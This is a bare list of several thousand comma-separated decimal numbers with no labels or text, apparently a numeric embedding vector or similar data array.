0.013496329076588154, 0.013068108819425106, -0.024305205792188644, 0.03313540667295456, -0.0019343753810971975, 0.028424981981515884, -0.06780650466680527, 0.05168178677558899, 0.006984424311667681, -0.0036841731052845716, 0.02200167439877987, -0.04110917076468468, 0.004776873625814915, -0.0552256815135479, 0.0063347104005515575, 0.007324047386646271, 0.007693203166127205, -0.02455623261630535, -0.05593445897102356, -0.03357839584350586, 0.000984722631983459, 0.006460223346948624, 0.02564893290400505, -0.027081256732344627, -0.031540654599666595, -0.007611989043653011, -0.010528318583965302, 0.028395449742674828, 0.003643566044047475, -0.05327653884887695, -0.012108304537832737, 0.006142749451100826, -0.012233817018568516, 0.009051695466041565, -0.022872881963849068, 0.033076342195272446, -0.024216609075665474, 0.005009441636502743, -0.026771165430545807, 0.028395449742674828, 0.10997883975505829, 0.014345386996865273, 0.004226831719279289, -0.007885163649916649, -0.017291249707341194, 0.023685025051236153, 0.029576748609542847, -0.03322400525212288, -0.049466852098703384, -0.007279748562723398, 0.018251053988933563, -0.02209027297794819, 0.0015458391280844808, -0.013097641058266163, -0.00021918614220339805, -0.017424145713448524, 0.05351279675960541, -0.018694041296839714, 0.014625945128500462, -0.017261717468500137, -0.01262512244284153, -0.04887620359659195, -0.003964731469750404, -0.007231758441776037, -0.012721102684736252, 0.008763754740357399, 0.0003123979549854994, -0.048462748527526855, 0.01766040548682213, -0.0012302111135795712, 0.020451221615076065, -0.04713378846645355, -0.04196561127901077, 0.042851585894823074, 0.011214947327971458, -0.01330436859279871, -0.02442333474755287, 0.003748775226995349, -0.0006095682037994266, -0.03467109426856041, -0.0011296161683276296, 0.008379832841455936, -0.04725191742181778, 0.010299441404640675, 0.007246524561196566, 0.03340119868516922, 0.010018883273005486, 0.022370830178260803, 0.01038803905248642, -0.00497621763497591, -0.020052533596754074, -0.02525024488568306, -0.021927842870354652, 0.007324047386646271, -0.00657466147094965, 0.007567690219730139, -0.0293700210750103, 0.014426601119339466, 0.04748817905783653, -0.015903223305940628, 0.020436454564332962, -0.030049268156290054, 0.010351123288273811, 0.021027103066444397, 0.01301642693579197, -0.044830258935689926, -0.009856455028057098, 0.012019706889986992, 0.03786059841513634, -0.03753574192523956, 0.024452868849039078, -0.042674388736486435, 0.018886001780629158, -0.007360963150858879, -0.00871945545077324, -0.010358506813645363, -0.03139299526810646, 0.04993937164545059, -0.0070730214938521385, 0.018753105774521828, -0.024733426049351692, 0.017911430448293686, 0.012676804326474667, 0.03975067660212517, -0.011798213236033916, 0.04550950601696968, -0.020229727029800415, -0.010476636700332165, -0.014352770522236824, 0.010727662593126297, 0.0013225000584498048, 0.001567988540045917, -0.0014018684159964323, 0.015002484433352947, -0.024777725338935852, -0.02384745329618454, 0.018221521750092506, -0.020288793370127678, 0.06562110036611557, -0.005005750339478254, -0.03555706888437271, -0.033903252333402634, -0.031186265870928764, 0.021721117198467255, 0.002556402701884508, 0.008616091683506966, 0.013097641058266163, -0.036797430366277695, -0.0020008233841508627, -0.007246524561196566, 0.007508625276386738, 0.030536552891135216, -0.02424614131450653, -0.010919623076915741, -0.010594766587018967, -0.0293700210750103, 0.00231829727999866, -0.0028221947140991688, -0.030566085129976273, -0.020849909633398056, 0.021056637167930603, 0.031895045191049576, -0.007693203166127205, -0.004961451515555382, 0.018531611189246178, 0.001677812309935689, 0.0008485964499413967, -0.0022979937493801117, 0.004012721590697765, -0.01692209392786026, -0.004374493844807148, -0.03729948401451111, 0.026091918349266052, -0.0027557467110455036, -0.016730133444070816, -0.014352770522236824, 0.04299924522638321, 0.0023330633994191885, -0.01901889778673649, -0.03966207802295685, -0.007671053521335125, 0.024408569559454918, 0.00802544318139553, -0.021662050858139992, 0.028129657730460167, -0.012064005248248577, 0.010240376926958561, 0.008881883695721626, 0.003623262280598283, 0.007312972564250231, -0.03174738213419914, -0.019609546288847923, 0.011650551110506058, -0.01863497495651245, -0.013341284357011318, 0.014913886785507202, -0.030536552891135216, -0.004392951726913452, -0.03168831765651703, -0.0006981655606068671, -0.030270760878920555, 0.015327340923249722, -0.03620678186416626, -0.016331445425748825, 0.014057446271181107, 0.001791327609680593, -0.01643480733036995, 0.0028185031842440367, 0.0009690335136838257, 0.02442333474755287, -0.021972142159938812, -0.005098039284348488, 0.032987747341394424, 0.007944229058921337, 0.019447118043899536, 0.009671877138316631, -0.005267850589007139, 0.04813789203763008, 0.028424981981515884, -0.045391373336315155, 0.0104101886972785, 0.03019692935049534, 0.016464341431856155, -0.02464482933282852, 0.0076193721033632755, -0.011665317229926586, 0.00012366713781375438, -0.007169002201408148, 0.0021226448006927967, 0.032721955329179764, -0.0036269540432840586, -0.0065488205291330814, 0.005256775766611099, -0.002707756357267499, -0.023212505504488945, -0.04353082925081253, 0.017601339146494865, -0.019181326031684875, 0.03366699069738388, 0.006438074167817831, -0.036502107977867126, 0.026224814355373383, -0.032249435782432556, -0.02336016669869423, 0.006559895351529121, -0.012588206678628922, 0.014264172874391079, 0.004643977619707584, -0.003975805826485157, -0.04562763497233391, -0.009716175496578217, 0.002783433301374316, 0.004883928690105677, -0.035261742770671844, -0.017468443140387535, 0.018531611189246178, -0.01551930233836174, -0.031895045191049576, 0.0001406252122251317, -0.02170635014772415, 0.03269242122769356, -0.003924124408513308, -0.008785903453826904, 0.02463006228208542, -0.019520949572324753, 0.024452868849039078, -0.05002797022461891, -0.004485240671783686, -0.018694041296839714, 0.01879740320146084, -0.010646448470652103, -0.0013123481767252088, 0.022739985957741737, 0.045745763927698135, -0.03295821323990822, 0.0002471035404596478, -0.02897133305668831, 0.0021244906820356846, 0.033785123378038406, 0.03966207802295685, 0.021012337878346443, 0.0010022574570029974, 0.02362595871090889, 0.014854822307825089, 0.009790007025003433, -0.003004926722496748, -0.002722522709518671, -0.003431301563978195, -0.007128395140171051, 0.006995499134063721, 0.026269113644957542, -0.005854808259755373, -0.044741660356521606, -0.005696071311831474, 0.03159971907734871, -0.008933565579354763, 0.0015163066564127803, -0.03629538044333458, -0.0035715806297957897, 0.004688276443630457, -0.030979540199041367, 0.0053047663532197475, -0.011163265444338322, -0.0688106045126915, 0.004230523481965065, -0.02471866086125374, 0.016272379085421562, 0.003425764152780175, -0.002305376809090376, -0.00966449361294508, -0.002720676828175783, -0.05936022475361824, 0.01924039050936699, 0.022296998649835587, -0.0499689057469368, 0.000009084688826987986, 0.036886028945446014, -0.0028997173067182302, -0.006497138645499945, -0.01678919792175293, -0.028735073283314705, -0.026402009651064873, 0.025235477834939957, -0.03387371823191643, -0.04536184296011925, -0.034966420382261276, 0.037506211549043655, -0.051091138273477554, -0.018295353278517723, 0.0015439933631569147, -0.006770314183086157, 0.026593970134854317, -0.029960669577121735, 0.03617725148797035, 0.008291235193610191, -0.02148485742509365, 0.015814626589417458, -0.01863497495651245, 0.0104101886972785, 0.048639945685863495, -0.005112805403769016, 0.020761311054229736, -0.01959478110074997, -0.012418394908308983, -0.03848078101873398, 0.002434581285342574, 0.028705541044473648, 0.00483224680647254, 0.005286308471113443, -0.015770327299833298, 0.0341985747218132, 0.0019233007915318012, -0.04397381842136383, 0.011982791125774384, 0.009243656881153584, 0.018339650705456734, 0.03520267829298973, 0.0005348142003640532, -0.001730416901409626, 0.06804276257753372, -0.020096831023693085, 0.02765713818371296, -0.05002797022461891, 0.01400576438754797, -0.024925386533141136, 0.017940962687134743, 0.007936845533549786, -0.03747667744755745, -0.007663670461624861, 0.01165793463587761, 0.005278925411403179, -0.032278966158628464, 0.021927842870354652, 0.012817082926630974, 0.012669420801103115, 0.0013723360607400537, -0.024792490527033806, -0.038687508553266525, -0.013127174228429794, 0.015113230794668198, -0.00859394297003746, 0.007246524561196566, 0.03611818701028824, -0.01652340590953827, -0.0057034543715417385, -0.01761610619723797, -0.02818872220814228, 0.011296161450445652, 0.008926182985305786, 0.023389700800180435, -0.0015532223042100668, -0.017542274668812752, 0.011096817441284657, 0.0033703907392919064, 0.005319532472640276, 0.01955048181116581, -0.009502065367996693, -0.027376580983400345, 0.008557027205824852, 0.014064828865230083, -0.03313540667295456, 0.0010650139302015305, 0.025132114067673683, 0.016508638858795166, 0.012676804326474667, 0.01369567308574915, 0.030566085129976273, -0.021145233884453773, -0.04226093366742134, 0.011369992978870869, -0.024349505081772804, 0.02691882848739624, -0.03437577188014984, 0.004909769631922245, 0.01955048181116581, -0.013311751186847687, -0.01137737650424242, -0.01190157700330019, -0.044032882899045944, -0.020155897364020348, -0.010218227282166481, 0.03260382264852524, 0.04477119445800781, 0.00916244275867939, -0.011776064522564411, 0.012558674439787865, -0.00019530639110598713, 0.023330634459853172, -0.006965966429561377, 0.027937697246670723, -0.0027243683580309153, 0.008844968862831593, 0.021292896941304207, -0.019033662974834442, -0.003909357823431492, 0.06065965071320534, -0.01788189820945263, -0.0013123481767252088, 0.05112066864967346, -0.0411977656185627, -0.0038502931129187346, -0.0021152617409825325, 0.002386591164395213, 0.0015809088945388794, -0.04745864495635033, -0.016552938148379326, -0.031274862587451935, 0.02095327340066433, 0.012853998690843582, 0.04007553309202194, -0.013584926724433899, -0.042054206132888794, -0.006124291568994522, 0.012440544553101063, 0.02669733390212059, -0.018310118466615677, 0.016139483079314232, 0.002547173760831356, -0.03346026688814163, 0.007228067144751549, -0.003239340614527464, -0.060600586235523224, -0.02928142435848713, -0.01023299340158701, 0.0262986458837986, -0.003820760641247034, 0.019580014050006866, -0.011074668727815151, 0.009502065367996693, -0.00007550385635113344, -0.010026266798377037, -0.02073177881538868, 0.05711575597524643, -0.013260070234537125, 0.006057843565940857, -0.019004130735993385, -0.008401981554925442, -0.0023552128113806248, 0.009391319006681442, -0.03148159012198448, -0.005408129654824734, -0.004765798803418875, -0.016124717891216278, -0.020672714337706566, 0.02178018167614937, 0.010594766587018967, 0.01095653884112835, -0.0010742428712546825, 0.019712910056114197, -0.010565233416855335, 0.013060725294053555, -0.03086140938103199, 0.047635842114686966, 0.0024954918771982193, -0.004212065599858761, -0.001105621107853949, 0.021854013204574585, -0.008187871426343918, 0.0006086453213356435, -0.02905992977321148, -0.026593970134854317, 0.01231503114104271, -0.00266899517737329, 0.02656443789601326, 0.00008761677599977702, 0.003300251206383109, 0.024925386533141136, 0.025397906079888344, 0.0005555792013183236, -0.011805596761405468, -0.023123908787965775, 0.028129657730460167, 0.009612812660634518, -0.02099757082760334, -0.00659681111574173, 0.011997557245194912, 0.011362609453499317, 0.003010464133694768, 0.013466796837747097, -0.05620025098323822, -0.002763129770755768, 0.011827746406197548, 0.018516846001148224, -0.00719115138053894, -0.02306484244763851, 0.04562763497233391, -0.014035296626389027, 0.012100921012461185, 0.03576379641890526, 0.04781303554773331, 0.001448935829102993, -0.022548025473952293, 0.03744714707136154, -0.01805909350514412, -0.016863029450178146, -0.021189533174037933, -0.006316252518445253, 0.016803963109850883, 0.0011166956974193454, -0.02932572178542614, -0.001912226085551083, -0.018221521750092506, 0.004518464673310518, 0.03983927518129349, 0.015844158828258514, -0.0011776064056903124, 0.007833481766283512, 0.020569350570440292, 0.004237906541675329, 0.017173118889331818, 0.0074717095121741295, 0.019712910056114197, -0.04350129887461662, 0.02652014046907425, -0.039041899144649506, 0.02516164630651474, 0.04019366204738617, 0.010196078568696976, -0.01740937866270542, -0.00925103947520256, -0.04025273025035858, -0.028705541044473648, 0.017497975379228592, -0.009502065367996693, -0.048817139118909836, 0.0036103420425206423, -0.0011757606407627463, 0.03620678186416626, -0.033342134207487106, -0.015430704690515995, -0.012514375150203705, 0.007479093037545681, -0.0014378611231222749, -0.018118157982826233, 0.031629253178834915, -0.01876787096261978, 0.0067333984188735485, 0.002886796835809946, -0.01915179379284382, 0.003475600155070424, 0.008136189542710781, -0.0438261553645134, -0.016981158405542374, -0.0007475401507690549, 0.02437903732061386, 0.011584103107452393, 0.008911416865885258, 0.00885235145688057, 0.04125683009624481, 0.012721102684736252, -0.01819198951125145, -0.009199357591569424, -0.009443000890314579, 0.003525436157360673, -0.01959478110074997, 0.013843335211277008, 0.0020875749178230762, -0.01968337781727314, 0.0009058155701495707, -0.017630871385335922, 0.0047694905661046505, 0.026062386110424995, 0.008601325564086437, 0.04494838789105415, -0.0385693795979023, -0.00868253968656063, -0.01120018120855093, 0.0038909001741558313, -0.0037321632262319326, -0.012957362458109856, -0.01618378236889839, 0.00692535936832428, 0.01510584820061922, -0.005991395562887192, 0.019491417333483696, 0.007198534440249205, 0.014485666528344154, 0.014773608185350895, -0.017025457695126534, -0.010048415511846542, -0.016109950840473175, 0.03916002810001373, -0.003121210727840662, 0.02315344102680683, 0.031452059745788574, -0.009457767009735107, 0.022075505927205086, 0.02415754273533821, -0.009959818795323372, 0.009538981132209301, -0.02178018167614937, -0.028735073283314705, 0.0017710240790620446, -0.03354886174201965, -0.028572645038366318, -0.017778534442186356, -0.022592322900891304, -0.0005002058460377157, 0.004311737604439259, 0.004599678795784712, 0.016449574381113052, -0.005415512714534998, 0.0046144453808665276, 0.01120018120855093, 0.038598909974098206, -0.014721926301717758, -0.007826099172234535, -0.005053740460425615, 0.0040201046504080296, -0.02560463361442089, 0.0054708863608539104, -0.002602547174319625, -0.017261717468500137, -0.01441921852529049, -0.0029735486023128033, 0.006445457227528095, 0.012329797260463238, 0.0020561967976391315, 0.020628415048122406, -0.0036620236933231354, 0.010919623076915741, -0.013858102262020111, -0.02823302149772644, 0.02879413776099682, 0.01647910661995411, -0.008143573068082333, 0.006471298169344664, -0.006216580513864756, -0.003340858267620206, 0.017763767391443253, -0.0030252302531152964, -0.017822833731770515, 0.036886028945446014, -0.01893029920756817, -0.01792619749903679, 0.0036527947522699833, -0.0023939742241054773, -0.006652184296399355, -0.005005750339478254, -0.03165878728032112, 0.008948332630097866, 0.014293705113232136, 0.017985261976718903, -0.024585764855146408, -0.04725191742181778, 0.012248583137989044, 0.007767034228891134, -0.0037838451098650694, -0.003931507468223572, 0.02652014046907425, -0.031895045191049576, -0.003913049586117268, -0.02235606499016285, 0.010144396685063839, -0.012647271156311035, -0.008992630988359451, -0.01609518565237522, 0.016316678375005722, -0.004378185607492924, 0.01012963056564331, -0.011502888984978199, -0.004344961605966091, -0.01258082315325737, 0.0013557240599766374, -0.01481790654361248, 0.009516831487417221, -0.007331430446356535, -0.02451193332672119, -0.003820760641247034, -0.018708806484937668, 0.0010797801660373807, -0.06585736572742462, -0.015297808684408665, -0.06119123473763466, 0.005264159291982651, 0.007634138222783804, -0.020894207060337067, 0.023330634459853172, -0.003067683195695281, 0.010631681419909, 0.006659567356109619, 0.005371214356273413, -0.042408596724271774, 0.0243347380310297, -0.043324101716279984, 0.040961507707834244, -0.006537746172398329, 0.016685834154486656, 0.0306842140853405, 0.020982805639505386, -0.0019915944430977106, -0.0018097853753715754, 0.006759239360690117, 0.0009708792786113918, -0.03346026688814163, 0.008077125065028667, -0.0036767900455743074, -0.03918956220149994, -0.010166545398533344, -0.027996761724352837, 0.03337166830897331, -0.0069770412519574165, 0.008512728847563267, 0.025412673130631447, -0.0036841731052845716, -0.005208785645663738, 0.011960642412304878, 0.012182135134935379, -0.013474180363118649, -0.0005052817286923528, 0.02279905043542385, -0.0017073447816073895, 0.016080418601632118, 0.010904856957495213, -0.020185429602861404, -0.008867117576301098, -0.03284008428454399, -0.024039413779973984, 0.026534905657172203, 0.02923712506890297, -0.00942823477089405, 0.011104200966656208, -0.003745083697140217, -0.03121579810976982, 0.011982791125774384, -0.0438261553645134, 0.010572616942226887, 0.016848262399435043, 0.002126336330547929, -0.027066489681601524, 0.021071402356028557, -0.02823302149772644, 0.01165793463587761, -0.04441680386662483, -0.029606280848383904, -0.00872683897614479, -0.030226461589336395, -0.0029901606030762196, -0.017955729737877846, 0.012772784568369389, 0.006818304304033518, 0.017335547134280205, 0.016375742852687836, 0.01801479421555996, 0.04054805263876915, -0.028262553736567497, 0.015858925879001617, -0.0346415638923645, 0.003924124408513308, 0.012182135134935379, -0.012071388773620129, 0.031895045191049576, -0.015430704690515995, 0.0008836662746034563, -0.000865208450704813, -0.0062461132183671, -0.0039056665264070034, 0.014338004402816296, -0.026446308940649033, -0.019712910056114197, -0.003289176616817713, -0.038067325949668884, -0.019712910056114197, -0.03372605890035629, -0.0028037368319928646, -0.04704519361257553, 0.03357839584350586, -0.0197276771068573, 0.010173928923904896, 0.0029883147217333317, -0.005164487287402153, -0.018708806484937668, 0.02090897411108017, 0.011628402397036552, -0.004034870769828558, 0.0055188764818012714, -0.019447118043899536, -0.016936859115958214, -0.041404493153095245, -0.016065651550889015, -0.0029698568396270275, 0.00791469682008028, -0.010720279067754745, -0.0067813885398209095, 0.0027908163610845804, -0.00762675516307354, 0.05076628178358078, 0.000927042041439563, -0.025722762569785118, -0.007818715646862984, -0.010314207524061203, -0.005991395562887192, -0.025634165853261948, 0.028705541044473648, -0.006445457227528095, -0.01963907852768898, 0.0016030583065003157, 0.010454487055540085, 0.008616091683506966, 0.01341511495411396, 0.02144055813550949, -0.011849895119667053, 0.00871945545077324, -0.021986909210681915, -0.012809700332581997, -0.01910749450325966, -0.00817310530692339, -0.020229727029800415, -0.0005038974341005087, 0.007346196565777063, 0.04435773938894272, -0.01163578499108553, 0.006803538184612989, 0.0048765456303954124, 0.04698612540960312, 0.01165793463587761, -0.005271542351692915, -0.021632518619298935, 0.001982365734875202, 0.009155059233307838, 0.007242833264172077, -0.0024585763458162546, -0.03195410966873169, -0.011022986844182014, -0.008062358945608139, 0.019225625321269035, -0.022119805216789246, -0.028705541044473648, 0.015238744206726551, 0.0025324076414108276, -0.05575726553797722, 0.022725218906998634, 0.015150146558880806, 0.016198549419641495, -0.015068932436406612, -0.009671877138316631, 0.04072524607181549, -0.022474193945527077, -0.0008928951574489474, -0.03360792621970177, -0.029842540621757507, 0.013119790703058243, 0.006157515570521355, -0.05239056423306465, -0.04361942782998085, 0.004348653368651867, -0.0004395259020384401, -0.028557877987623215, -0.01565219834446907, 0.007789183408021927, 0.014374920167028904, -0.018339650705456734, 0.02231176570057869, -0.010196078568696976, 0.0017525663133710623, -0.0059064896777272224, -0.011126350611448288, -0.022636622190475464, 0.0018190143164247274, 0.004588604439049959, -0.004835938569158316, 0.00927318911999464, -0.013444647192955017, -0.0071800765581429005, 0.03086140938103199, 0.010137013159692287, 0.027125554159283638, -0.00846104696393013, -0.007796566467732191, -0.006951200310140848, -0.013747354969382286, 0.003763541579246521, -0.03405091539025307, 0.022739985957741737, 0.014625945128500462, 0.022075505927205086, 0.0089852474629879, 0.018073858693242073, 0.013931932859122753, -0.008800669573247433, 0.012824466452002525, 0.011274012736976147, 0.03564566746354103, 0.001620593131519854, -0.03340119868516922, 0.047665372490882874, -0.00005520030026673339, 0.0434127002954483, -0.01164316851645708, 0.0026874528266489506, -0.03322400525212288, -0.03402138128876686, 0.00740895327180624, -0.010351123288273811, 0.027849100530147552, -0.00035992672201246023, 0.0018263973761349916, -0.02691882848739624, 0.011805596761405468, -0.01850207895040512, -0.004415101371705532, -0.000746617210097611, -0.017542274668812752, 0.0124922264367342, -0.015711262822151184, -0.01959478110074997, 0.006892135366797447, 0.015091082081198692, -0.004315429367125034, 0.011104200966656208, 0.04488932341337204, 0.004352344665676355, -0.012817082926630974, 0.01758657395839691, -0.011680083349347115, 0.011864661239087582, 0.02173588238656521, -0.014766224659979343, 0.0032744102645665407, 0.026269113644957542, 0.016272379085421562, 0.01108943484723568, -0.0034202267415821552, 0.012787550687789917, 0.0058105094358325005, -0.002591472351923585, -0.025456970557570457, -0.007730118464678526, -0.018900766968727112, -0.013976232148706913, -0.0014074058271944523, 0.009450383484363556, -0.0062387301586568356, -0.04308784380555153, -0.01894506625831127, 0.0038059945218265057, -0.00485439645126462, 0.0044889324344694614, 0.021278129890561104, 0.010292058810591698, -0.01872357353568077, 0.014544731006026268, 0.007412645034492016, 0.04914199560880661, -0.026904061436653137, -0.019048430025577545, -0.017114054411649704, -0.00966449361294508, -0.010159162804484367, 0.028041061013936996, 0.010506168939173222, 0.004178841598331928, -0.039957404136657715, -0.005936022382229567, -0.03337166830897331, -0.03369652479887009, -0.0473405160009861, 0.0027114481199532747, 0.029931137338280678, 0.0008241399191319942, 0.005899106618016958, 0.017306014895439148, 0.00802544318139553, -0.009723559021949768, 0.010919623076915741, 0.008453663438558578, 0.00011541881394805387, 0.0059064896777272224, -0.022370830178260803, -0.003820760641247034, -0.014884354546666145, -0.014995100907981396, -0.020761311054229736, -0.0006340247928164899, -0.011931109242141247, -0.04807882755994797, -0.008320767432451248, -0.008512728847563267, -0.008372449316084385, 0.01850207895040512, -0.03957348316907883, -0.014205108396708965, 0.004765798803418875, -0.01783759891986847, -0.019653845578432083, -0.014515198767185211, 0.011650551110506058, -0.010594766587018967, 0.0688106045126915, 0.036590706557035446, -0.0054708863608539104, -0.013525862246751785, -0.006194431334733963, -0.008859734982252121, -0.014175576157867908, 0.007028723135590553, 0.01743891090154648, 0.005035282578319311, 0.012004940770566463, -0.013164089061319828, -0.01801479421555996, -0.006002470385283232, 0.003872442524880171, -0.01108943484723568, -0.0027871248312294483, -0.010439720936119556, 0.016671067103743553, 0.007707969285547733, -0.00009171209967462346, 0.031895045191049576, 0.042142804712057114, -0.0019491416169330478, -0.005433970596641302, -0.020790845155715942, -0.037683404982089996, -0.006873677484691143, 0.003134131198748946, -0.005101730581372976, -0.02714032121002674, -0.02226746641099453, 0.0018051710212603211, 0.0024659596383571625, -0.0019897487945854664, -0.002785279182717204, -0.0011462281690910459, 0.00911814346909523, 0.01881217025220394, -0.010188695043325424, 0.0062867202796041965, -0.011347843334078789, 0.012986894696950912, -0.00006298717926256359, 0.005976629443466663, -0.021160000935196877, 0.038126390427351, 0.01273586880415678, 0.0036712526343762875, -0.016021354123950005, -0.008106657303869724, -0.025752296671271324, 0.0025250243488699198, 0.030123097822070122, -0.008697306737303734, 0.011325694620609283, -0.018561145290732384, 0.01625761389732361, -0.014301088638603687, -0.013607076369225979, 0.008424131199717522, -0.008335533551871777, 0.024836789816617966, 0.03192457929253578, 0.01757180690765381, 0.011392142623662949, -0.030536552891135216, 0.0016538171330466866, 0.014581646770238876, 0.016405275091528893, 0.01881217025220394, -0.000524662435054779, -0.0051312632858753204, -0.01137737650424242, 0.02152915485203266, 0.023374933749437332, -0.030920473858714104, -0.01317147258669138, -0.023965582251548767, -0.00636793440207839, 0.015327340923249722, 0.030270760878920555, 0.002659766236320138, 0.02003776654601097, -0.009967201389372349, -0.002678224118426442, 0.0025582483503967524, -0.005921256262809038, -0.012861381284892559, -0.020569350570440292, -0.0036786356940865517, 0.004643977619707584, 0.012270732782781124, 0.004005338530987501, 0.0034331472124904394, -0.0009016625699587166, -0.004536922555416822, -0.005718220490962267, -0.001620593131519854, -0.019565246999263763, 0.0006557126762345433, 0.015489770099520683, 0.014766224659979343, 0.018206754699349403, -0.01455211453139782, 0.009908136911690235, 0.0168777946382761, 0.002947707660496235, -0.013001660816371441, 0.013090258464217186, -0.01396146509796381, -0.004189916420727968, -0.01582939364016056, -0.03112720139324665, -0.010919623076915741, -0.02533884160220623, 0.00927318911999464, -0.017527509480714798, 0.0252059455960989, -0.027686670422554016, -0.018959833309054375, -0.012263349257409573, 0.020761311054229736, -0.025678465142846107, 0.017306014895439148, -0.011532421223819256, 0.011141116730868816, -0.016892561689019203, 0.03142252564430237, 0.0019029972609132528, 0.034434836357831955, 0.024570997804403305, 0.026446308940649033, -0.02021496184170246, 0.018029561266303062, 0.00041968378354795277, 0.03207223862409592, -0.020244494080543518, 0.020820377394557, -0.003017847193405032, -0.0009376552770845592, 0.03130439668893814, 0.035793330520391464, 0.02634294517338276, 0.018295353278517723, 0.007312972564250231, -0.0019140718504786491, 0.007744885049760342, 0.021839246153831482, 0.011126350611448288, 0.024777725338935852, -0.014766224659979343, 0.004267438780516386, 0.03898283466696739, 0.00041437719482928514, -0.011082051321864128, 0.0015246126567944884, -0.014640712179243565, -0.019978702068328857, -0.012440544553101063, -0.006633726414293051, 0.017483210191130638, 0.03898283466696739, -0.0038466015830636024, -0.011429058387875557, 0.014057446271181107, 0.0026929902378469706, -0.05301074683666229, -0.025944257155060768, 0.0010161008685827255, -0.001503386301919818, -0.0033925401512533426, -0.010461870580911636, -0.005574249662458897, 0.011310928501188755, -0.005197711288928986, -0.019432350993156433, -0.019978702068328857, 0.00266345776617527, -0.0016547400737181306, 0.010284675285220146, 0.010469253174960613, -0.018339650705456734, -0.024408569559454918, 0.034700628370046616, -0.008010677061975002, 0.01538640633225441, -0.0021152617409825325, -0.04255625978112221, 0.01341511495411396, 0.009258423000574112, 0.0337555892765522, -0.02175064943730831, -0.01569649763405323, -0.03487782180309296, -0.01630191132426262, 0.014433984644711018, 0.00742002809420228, -0.004437250550836325, -0.019033662974834442, -0.007338813506066799, 0.015504536218941212, 0.013776887208223343, 0.0032817935571074486, 0.009826922789216042, -0.021204298362135887, -0.0023902826942503452, 0.01845778152346611, -0.01770470291376114, 0.0002932479837909341, -0.0005301997298374772, -0.004149309359490871, -0.004584912676364183, -0.005891723558306694, 0.0010714741656556726, 0.005038974341005087, 0.015578366816043854, -0.0001715420075925067, -0.0016907327808439732, 0.024615297093987465, -0.0017553350189700723, 0.014072212390601635, -0.015932755544781685, -0.015844158828258514, -0.018354417756199837, 0.018398715183138847, 0.04051852226257324, -0.01757180690765381, 0.0005449659656733274, 0.01932898722589016, 0.03183598071336746, 0.009900753386318684, 0.007010265253484249, -0.008409365080296993, -0.007523391395807266, 0.016907326877117157, 0.006508213467895985, -0.009922903031110764, 0.016892561689019203, -0.03275148570537567, 0.013732588849961758, 0.004344961605966091, -0.0050131333991885185, -0.011886810883879662, -0.03399185091257095, -0.00020038228831253946, -0.024039413779973984, 0.04435773938894272, 0.024216609075665474, 0.030920473858714104, 0.002942170249298215, 0.017645638436079025, 0.017497975379228592, -0.023995114490389824, -0.006142749451100826, 0.0199491698294878, 0.007944229058921337, -0.012455310672521591, 0.025397906079888344, -0.010624298825860023, 0.006803538184612989, 0.009922903031110764, -0.00970879290252924, -0.00043744940194301307, -0.022031206637620926, 0.017084522172808647, -0.018575910478830338, 0.009147676639258862, -0.022695686668157578, 0.010690746828913689, -0.013112407177686691, 0.02389175072312355, 0.0022666153963655233, -0.004880237393081188, -0.011672700755298138, 0.00232383469119668, 0.01758657395839691, -0.025146881118416786, -0.005146029405295849, 0.0032854850869625807, 0.014367536641657352, 0.032721955329179764, -0.0017322627827525139, -0.03340119868516922, 0.024733426049351692, 0.02652014046907425, -0.022149337455630302, -0.029532449319958687, -0.003139668609946966, -0.014345386996865273, -0.0040311794728040695, 0.031245332211256027, 0.0011923726415261626, -0.011960642412304878, 0.017911430448293686, -0.00019357597921043634, -0.0337555892765522, 0.030654681846499443, 0.004810097627341747, -0.0037358547560870647, 0.02086467482149601, -0.0018633130239322782, 0.04415101185441017, 0.021662050858139992, -0.02293194644153118, 0.022828582674264908, -0.0008965866873040795, -0.008180488832294941, 0.014072212390601635, -0.006242421455681324, 0.0043818773701786995, -0.03213130310177803, -0.008844968862831593, -0.008446280844509602, -0.0036730982828885317, 0.027022190392017365, -0.003283639205619693, 0.0066263433545827866, -0.010432337410748005, -0.005729295313358307, 0.021676817908883095, -0.001320654177106917, -0.004787948448210955, -0.03936675563454628, 0.004898695275187492, 0.009228890761733055, -0.003641720162704587, 0.021854013204574585, -0.010269909165799618, -0.007412645034492016, 0.0032633356750011444, 0.022060738876461983, 0.02051028609275818, 0.00999673455953598, 0.0013132711173966527, -0.00762675516307354, 0.011716999113559723, 0.021898310631513596, -0.004167766775935888, -0.02612145058810711, -0.012514375150203705, 0.039603013545274734, -0.01630191132426262, 0.008623475208878517, 0.017468443140387535, 0.01111158449202776, 0.0036306455731391907, 0.022164102643728256, -0.02175064943730831, -0.0018688503187149763, -0.031186265870928764, -0.03165878728032112, 0.007235450204461813, 0.021942609921097755, 0.001502463361248374, 0.02288764901459217, -0.002497337758541107, -0.005382288713008165, 0.00657466147094965, -0.01025514304637909, -0.04016413167119026, -0.003278101794421673, -0.009324871003627777, -0.01625761389732361, -0.011665317229926586, -0.00970879290252924, -0.013511095196008682, -0.011369992978870869, 0.0028517271857708693, -0.008409365080296993, -0.011916343122720718, -0.007453252095729113, -0.0067924633622169495, 0.008313384838402271, -0.019077962264418602, 0.007534466218203306, 0.02293194644153118, -0.012086154893040657, -0.022858116775751114, 0.021012337878346443, -0.007567690219730139, 0.011672700755298138, 0.012041856534779072, 0.0030344591941684484, -0.010963921435177326, -0.005382288713008165, -0.009612812660634518, 0.01652340590953827, -0.015002484433352947, -0.009066461585462093, 0.011340460740029812, -0.024231374263763428, -0.004562763497233391, 0.03626584634184837, -0.009915519505739212, 0.007427411153912544, 0.02279905043542385, -0.009391319006681442, -0.005899106618016958, 0.00039084351737983525, 0.010550467297434807, 0.019786741584539413, -0.01560789905488491, 0.011628402397036552, 0.0009408853948116302, -0.0018208600813522935, -0.01108943484723568, -0.026623502373695374, 0.0067223235964775085, 0.014182958751916885, 0.0010280983988195658, 0.009110760875046253, 0.01097868848592043, -0.022193634882569313, -0.018132923170924187, -0.01231503114104271, -0.009561130777001381, -0.015814626589417458, -0.0016565858386456966, 0.002704064827412367, 0.0007406184449791908, 0.010609532706439495, -0.020968038588762283, 0.002259232336655259, 0.012396245263516903, -0.01538640633225441, 0.010749811306595802, -0.01758657395839691, 0.0011785293463617563, 0.042526725679636, -0.005242009647190571, 0.03384418785572052, 0.007700586225837469, 0.017291249707341194, -0.008977864868938923, -0.020200194790959358, -0.0033260921481996775, 0.008638241328299046, 0.005419204477220774, -0.013865484856069088, -0.0006967812078073621, 0.006648492533713579, -0.010690746828913689, 0.015460236929357052, -0.0017636410193517804, -0.002661612117663026, -0.0008924336871132255, 0.020849909633398056, -0.018649742007255554, -0.0071431612595915794, 0.02037739008665085, -0.012514375150203705, 